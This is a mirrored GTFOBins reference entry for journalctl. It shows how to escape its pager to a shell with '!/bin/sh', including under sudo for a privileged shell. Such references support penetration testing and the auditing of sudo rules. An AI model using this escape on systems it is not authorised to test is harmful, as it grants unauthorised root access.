1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-03-14 03:28:11 +01:00

16 lines
357 B
Markdown
Raw Normal View History

2018-10-01 18:53:58 +02:00
---
description: |
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
This might not work if run by unprivileged users depending on the system configuration.
2018-10-01 18:53:58 +02:00
functions:
2018-10-05 18:55:38 +01:00
shell:
2018-10-01 18:53:58 +02:00
- code: |
journalctl
!/bin/sh
2018-10-05 18:55:38 +01:00
sudo:
2018-10-01 18:53:58 +02:00
- code: |
sudo journalctl
!/bin/sh
---